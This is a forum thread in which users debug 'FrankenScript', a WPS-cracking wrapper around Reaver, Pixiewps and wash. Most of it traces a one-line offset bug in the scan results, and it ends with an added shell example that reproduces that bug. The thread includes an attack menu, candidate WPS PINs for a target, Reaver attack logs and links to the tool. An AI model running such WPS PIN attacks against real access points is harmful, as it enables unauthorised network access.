5: Luis 20:AA:4B:XX:XX:XX 00.dBm WPS-Locked-No Channel-11

When the truth is:

root@Linksys:~# wash -i mon0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID-----------------------------Channel----------------RSSI WPS Version WPS Locked ESSID


00:23:69:XX:XX:XX -----------6----------------00 1.0 No Luis




also you noticed that FS uses the Wash that is installed in Kali, and not the one in the FS folder? Maybe it's nothing, just thought I'd point that out.

slim76
2015-04-28, 22:56
Ok, so just to confirm the outstanding errors are:

1) wash scan access point details are messed up?.
2) Reaver displays the wrong ESSID?.

Is this correct?, or did I miss something?.

slim76
2015-04-28, 23:04
I may be doing something wrong. This is what happened:


MAC address for wlan2:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

MAC address for mon0:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

Target Details: "HAR0000000" 00:00:00:7D:B6:D0

Possible WPS Pins: 82388003 57952154 82109011 65949474

[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:

Picked 2

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:00:00:7D:B6:D0
[+] Associated with 00:00:00:7D:B6:D0 (ESSID: We hear you 0000000000)
[+] Trying pin 82109011
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:58:36:c7:b0:f2:74:ee:23:21:f2:5e:a5:b1:b4:46
[P] PKE: 2f:5c:5b:e6:52:8d:63:09:e0:d3:20:0d:8f:e8:70:c5:a6 :06:25:d9:15:bc:2f:63:6c:11:29:f4:28:e6:7d:8d:e8:f 7:f0:d8:0a:96:f6:1e:ea:fd:b1:7b:05:a2:ff:eb:e7:5d: cd:05:c1:5d:5c:0f:2c:86:1b:76:d0:97:9d:f1:b2:bc:30 :49:05:bb:77:8c:ff:d1:89:5b:3f:9c:71:a1:40:1b:7a:9 a:69:87:fc:34:5a:9f:2c:48:9f:97:f3:e4:8c:c2:91:9f: a9:c5:3d:75:8a:28:ab:a4:51:76:6d:a3:e7:33:bc:8f:2e :9b:30:64:fe:9c:e1:e0:d8:f4:ac:48:88:e7:34:e7:87:f 7:8d:ca:b6:18:b1:28:8e:20:8a:d7:77:9d:4b:05:e7:29: e4:06:0c:b8:81:af:8a:cc:11:be:72:be:ba:ee:1a:f5:58 :eb:d4:ee:5b:52:e4:9a:7e:91:ce:7f:49:2f:46:9e:c3:8 6:bf:5c:75:34:1a:1b:74:f9
[P] WPS Manufacturer: Cisco
[P] WPS Model Number: 123456
[+] Received M1 message
[P] AuthKey: 9c:fa:0e:5c:e6:81:9f:8c:16:22:da:d9:38:4c:b1:8a:cd :62:b6:39:c7:5f:6f:dd:70:56:38:bd:99:dc:38:9d
[+] Sending M2 message
[P] E-Hash1: 1e:6d:d4:e6:57:03:57:05:a0:7a:73:7c:14:21:91:ea:a1 :94:7f:d1:81:12:7e:3c:6e:cc:6f:4f:c7:a1:aa:56
[P] E-Hash2: 16:90:6b:e9:8b:ca:d8:c6:83:f1:34:fe:92:46:84:1b:35 :c4:08:bb:39:a4:21:2c:c0:c5:1d:b2:97:9a:03:3c
[+] Received M3 message

Script (reaver) displays different essid when attacking target on the (attack screen)........
Threw me off for a sec.

Which set of details were correct, were the details reaver used correct?, or were the Target Details: "HAR0000000" 00:00:00:7D:B6:D0 correct?.
Or were they both wrong?.
Oh and did you use the wash scan to get to those options?.

Quest
2015-04-28, 23:23
actually Slim I'm starting to wrap my brains around that problem. Confusing as ****.

It's not the wrong essid. It's the wrong AP altogether. In other words, all the info in reaver is correct. It's the Scan Results that is messed up. So when you select an AP, it really chooses the one below. So when choosing 8 it's choosing 7. Except that the names are mixed up in the Scan Results.

Do me a favour. Scan with Wash and copy paste the info from that scan. Then use FS to scan with Wash. Then compare the results from the first Wash scan to the Scan Results in FS.

nuroo
2015-04-28, 23:25
I asked script to attack:
Target Details: "HAR0000000" 00:00:00:7D:B6:00

It attacked:
[+] Associated with 00:00:00:7D:B6:00 (ESSID: We hear you 0000000000)

The bssid was the same, however the essid is wrong.

Quest
2015-04-28, 23:34
nuroo can you do the same as I asked Slim to do? Scan with Wash first > copy those results > FS > Scan results > compare both.

Thanks!

nuroo
2015-04-28, 23:57
Ok Done.... Quest is correct.

The scans from wash by command line and wash from frankenScript launched are both correct.
However how the script interprets the results is off by 1 line. So if you choose for instance 3, it attacks the next one instead.

Quest
2015-04-29, 00:09
great I won't have to sign up for the nut house just yet ;)

So it's really the Scan Results in FS that are offset by 1 line.

slim76
2015-04-29, 04:24
Ok I'm fairly sure I can fix the wash scan issue, but the wrong ESSID in reaver beats the **** out of me.
The reaver issue is really strange cause FrankenScript doesn't supply reaver with an ESSID, reaver chooses the ESSID.
So there must be a problem with reaver (Possibly it might have something to do with the location it's being executed from), or your kali installation.

I'm still adding things to FrankenScript, but I think I might upload what I have so far, that's after I fix the wash scan issue. LOL

Quest
2015-04-29, 12:10
Slim, forget about the wrong essid. That is not the problem as explained in previous posts.

Just run Wash by itself, leave that window open then > run FS and compare the Scan Results with the Wash window. You will see for yourself what the problem is.

slim76
2015-04-29, 12:15
Here's the latest FrankenScript, Updated 29th April 2015

FrankenScript_Portable.29th.April.2015.tar.gz
https://www.mirrorcreator.com/files/0S9GAICA/FrankenScript_Portable.29th.April.2015.tar.gz_links

slim76
2015-04-29, 12:20
Slim, forget about the wrong essid. That is not the problem as explained in previous posts.

Just run Wash by itself, leave that window open then > run FS and compare the Scan Results with the Wash window. You will see for yourself what the problem is.

I don't have the issue you're having, everything works perfect for me.
I think you really need to explain to me what the problem is with as much detail as possible.

Here's the latest FrankenScript, Updated 29th April 2015

FrankenScript_Portable.29th.April.2015.tar.gz
https://www.mirrorcreator.com/files/0S9GAICA/FrankenScript_Portable.29th.April.2015.tar.gz_links

Quest
2015-04-29, 12:36
The problem is the Scan Results in FS. Nothing else.

After the Wash scan in FS, the Scan Results are all messed up.

The wrong essid is shown with the rest of the information of the AP above it.

So when the user selects 7 on the Scan Results list, FS really picks 6.

So it appears as though it's the wrong essid in reaver, but it is not. It is however the wrong AP.

Quest
2015-04-29, 12:46
and this is the direct download for FrankenScript_Portable.29th.April.2015.tar.gz
5,7MB (5,65MB)

http://rghost.net/download/8PTsj4Zlm/8297de3c795b6b553227a5f964d4c5324a4189c4/FrankenScript_Portable.29th.April.2015.tar.gz

Quest
2015-04-29, 13:01
exact same issue with FrankenScript_Portable.29th.April.2015

Here is a clue: The Scan Results window is way too large. It covers my monitor's width. nuroo might confirm that.

Really Slim, try to reproduce it on your comp, or on another comp, because otherwise it's not possible to explain. Go to an Internet place with your USB pendrive and USB adapter > install FS, and run it. You will then see what we see.

Quest
2015-04-29, 13:35
560

here is a screenshot. Compare the Wash window with the Scan Results.

slim76
2015-04-29, 14:09
560

here is a screenshot. Compare the Wash window with the Scan Results.

Yeah I see what you mean now, I'll fix it and upload it later.

Quest
2015-04-29, 14:22
Thank you!!

It seems as though, the first AP result being messed up, it pushes the rest of the data offset.

So if you fix the first AP result, the rest will fall into place(?)

Quest
2015-04-29, 14:27
oh and there's a new reaver-wps-fork-t6x from 15hrs ago.

https://github.com/t6x/reaver-wps-fork-t6x

slim76
2015-04-29, 14:31
oh and there's a new reaver-wps-fork-t6x from 15hrs ago.

https://github.com/t6x/reaver-wps-fork-t6x

Already got it, I updated it using FrankenScript. :-) LOL

Can you do the following in FrankenScript.sh:

1) Change lines 1021,1022,1023.

FROM:

rm $DIR/TempFolder/SSIDList.txt &> /dev/null
rm $DIR/TempFolder/OtherDetailsList.txt &> /dev/null
rm $DIR/TempFolder/WashScan.txt &> /dev/null

TO:

# rm $DIR/TempFolder/SSIDList.txt &> /dev/null
# rm $DIR/TempFolder/OtherDetailsList.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

2) Browse to FrankenScripts temp folder and compare the following 3 files against each other:
eg: the ESSID on line 1 in SSIDList.txt should match with the details on line 1 in OtherDetailsList.txt

SSIDList.txt
OtherDetailsList.txt
ScanResults.txt

Does the lines in files SSIDList.txt & OtherDetailsList.txt match?.
Are all the details correct in ScanResults.txt?.

Quest
2015-04-29, 15:13
561

1) I opened FrankenScript.sh and Copy/Paste lines 1021,1022,1023, as indicated above. Then saved.

ran FS, and opened the Temp folder. New files appeared there.

2) here are the results in the pic.

PS: all the XX you see in the pic are my edit.

slim76
2015-04-29, 15:31
561

1) I opened FrankenScript.sh and Copy/Paste lines 1021,1022,1023, as indicated above. Then saved.

ran FS, and opened the Temp folder. New files appeared there.

2) here are the results in the pic.

PS: all the XX you see in the pic are my edit.

Ok, so are the details in ScanResults.txt correct?, that's excluding the first and last lines.

Quest
2015-04-29, 15:33
no they are not. They are all offset by one line. The essid does not match the rest.

Quest
2015-04-29, 15:41
562

and here is a pic of my FS.sh to remove all doubts.

slim76
2015-04-29, 16:31
562

and here is a pic of my FS.sh to remove all doubts.

Ok try this one, if this one doesn't work for you I'm gonna go and hang myself. LOL

https://www.mirrorcreator.com/files/8X65LTXY/FrankenScript_Portable.29th.April.2015.v2.tar.gz_links

Please let me know asap so I can update the first page.

Quest
2015-04-29, 16:44
what's your favourite color? White rope, black rope, blue rope? :p

now the attacks don't work and everything is way offset. Will post a pic later.

Quest
2015-04-29, 16:54
563

that is what I see. The bssid does correspond to the essid, but everything is messed up, and when selecting any target, the attacks don't work. It goes right back to the Scan Results, as seen in the pic. It's actually worse than before.

Quest
2015-04-29, 16:55
How can you get different results than this on your comp?? That's what I'd like to know.

slim76
2015-04-29, 17:11
How can you get different results than this on your comp?? That's what I'd like to know.

Have you modified your kali install in any way?.

Ok this is bugging me now??, try this one.

https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz_links

Check the ScanResults.txt file in the TempFolder and let me know if the details and everything is correct.

Quest
2015-04-29, 17:20
well maybe we better wait for more feedback before doing anything else?

Of course I have to modify my Kali install like everybody else. But I don't see what may be causing this.

Is that good?
https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz

what's that _0.gz ? Are you trying to make my comp explode at a distance?

slim76
2015-04-29, 17:32
well maybe we better wait for more feedback before doing anything else?

Of course I have to modify my Kali install like everybody else. But I don't see what may be causing this.

Is that good?
https://www.mirrorcreator.com/files/FS0VKPRC/FrankenScript_Portable.29th.April.2015.v3.tar_0.gz

what's that _0.gz ? Are you trying to make my comp explode at a distance?

No that's not what I uploaded, I wouldn't open or run that if I was you. lol
The upload must have got corrupted some way.

Here you go, try this one:
Click the big orange button at the top right of the page.
http://www67.zippyshare.com/v/iGUAkXKn/file.html

Quest
2015-04-29, 17:35
no it's just that you tarred it twice, so I had to decompress it twice.

No difference with that version than the one before. Exactly the same problem.

Did you really upload the right version?

slim76
2015-04-29, 17:42
no it's just that you tarred it twice, so I had to decompress it twice.

No difference with that version than the one before. Exactly the same problem.

Did you really upload the right version?

Just wanted to make sure we're both using the same version. lol
Now check the ScanResults.txt file in the TempFolder, are all the details correct and is everything lined up correctly?.

Quest
2015-04-29, 17:43
and btw Slim, everything is perfect with the airodump Scan Results. So it's really a format problem with the Scan Results from wash only.

What is the big difference in format between the two in FS?

Quest
2015-04-29, 17:54
Just wanted to make sure we're both using the same version. lol
Now check the ScanResults.txt file in the TempFolder, are all the details correct and is everything lined up correctly?.

564

no, and it's getting worse by the minute. I want my money back!.. oh wait :o

xD

slim76
2015-04-29, 18:14
564

no, and it's getting worse by the minute. I want my money back!.. oh wait :o

xD

I think it might be the paste command I used to merge the files side by side.

Quest
2015-04-29, 18:18
hmm? You lost me there.

slim76
2015-04-29, 18:24
hmm? You lost me there.

Can you compare the files Wash_Network_Scan-1.txt & Wash_Network_Scan-2.txt side by side to see if that information lines up correctly.

Quest
2015-04-29, 18:31
where are those files?

Quest
2015-04-29, 19:04
Slim, we should both see the same results. This is insane. Get someone else to confirm that bug or confirm that there is no bug. Then we can be fixed as to which machine tells the truth. Yours or mine.

Then, whoever has the faulty installation, will have to reformat and reinstall. Because right now, it's running round in circles.

If someone is willing to try and give feedback please do so.

slim76
2015-04-29, 23:05
Slim, we should both see the same results. This is insane. Get someone else to confirm that bug or confirm that there is no bug. Then we can be fixed as to which machine tells the truth. Yours or mine.

Then, whoever has the faulty installation, will have to reformat and reinstall. Because right now, it's running round in circles.

If someone is willing to try and give feedback please do so.

I've given up asking people for feedback cause nobody ever bothers to.

In FrankenScript change the following lines: 1021, 1022, 1023, 1024

FROM

# rm $DIR/TempFolder/Wash_Network_Scan.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-1.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-2.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

TO

# rm $DIR/TempFolder/Wash_Network_Scan.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-1.txt &> /dev/null
# rm $DIR/TempFolder/Wash_Network_Scan-2.txt &> /dev/null
# rm $DIR/TempFolder/WashScan.txt &> /dev/null

Then check the TempFolder for the files I mentioned.

Quest
2015-04-30, 11:30
all lines correspond between all three files Wash_Network_Scan.txt, Wash_Network_Scan-1.txt, Wash_Network_Scan-2.txt, and nothing seems offset.

slim76
2015-04-30, 11:57
all lines correspond between all three files Wash_Network_Scan.txt, Wash_Network_Scan-1.txt, Wash_Network_Scan-2.txt, and nothing seems offset.

Ok now we're getting closer to the problem.
So those 3 files were ok but ScanResults.txt is still messed up, Is this correct?.

Quest
2015-04-30, 11:58
one thing does not line up, vertically. There is a space before the lines in Wash_Network_Scan-2

565

isn't that enough to throw the script off? These dotted lines appear twice in the Scan Results.

Quest
2015-04-30, 12:00
Ok now we're getting closer to the problem.
So those 3 files were ok but ScanResults.txt is still messed up, Is this correct?.

Yes, nothing has changed from the last pic of the Scan Results.
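
The one-line offset discussed in the posts above, reproduced as an added example (it is not FrankenScript's code and was not posted by anyone in the thread). It assumes one possible cause, two extraction steps that skip a different number of header lines before `paste` merges them, and compares that with parsing each row in a single pass; the sample table and the function names are constructed for illustration.

```shell
#!/usr/bin/env bash
# Constructed sample in the column order of the wash table quoted in the thread.
# Every BSSID and ESSID here is made up.
sample_scan() {
cat <<'EOF'
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------
00:11:22:33:44:01  6        -60   1.0          No          alpha
00:11:22:33:44:02  11       -71   1.0          No          bravo net
00:11:22:33:44:03  11       -80   1.0          No          charlie
EOF
}

# Fragile (assumed cause): the ESSID column and the remaining details are
# written to two files by two different filters, then merged line by line.
split_and_paste() {
  tmp=$(mktemp -d)
  # ESSID list: skips the header AND the dashed separator (NR > 2).
  sample_scan | awk 'NR > 2 { e = $6; for (i = 7; i <= NF; i++) e = e " " $i; print e }' \
    > "$tmp/essid.txt"
  # Details list: skips only the header, so the dashed line survives as row 1.
  sample_scan | tail -n +2 | awk '{ print $1, "Channel-" $2 }' > "$tmp/details.txt"
  # paste pairs line N with line N and never checks that both describe the same row.
  paste -d' ' "$tmp/essid.txt" "$tmp/details.txt" | nl -w1 -s': '
  rm -rf "$tmp"
}

# Robust: decide per line whether it is a data row (first field is a MAC address)
# and emit ESSID and details together, so they cannot drift apart.
single_pass() {
  sample_scan | awk '
    split($1, p, ":") == 6 && length($1) == 17 && $1 !~ /[^0-9A-Fa-f:]/ {
      essid = $6
      for (i = 7; i <= NF; i++) essid = essid " " $i   # ESSIDs may contain spaces
      printf "%d: %s %s Channel-%s\n", ++n, essid, $1, $2
    }'
}

echo "split + paste (entry 2 carries the BSSID of entry 1):"
split_and_paste
echo "single pass:"
single_pass
```
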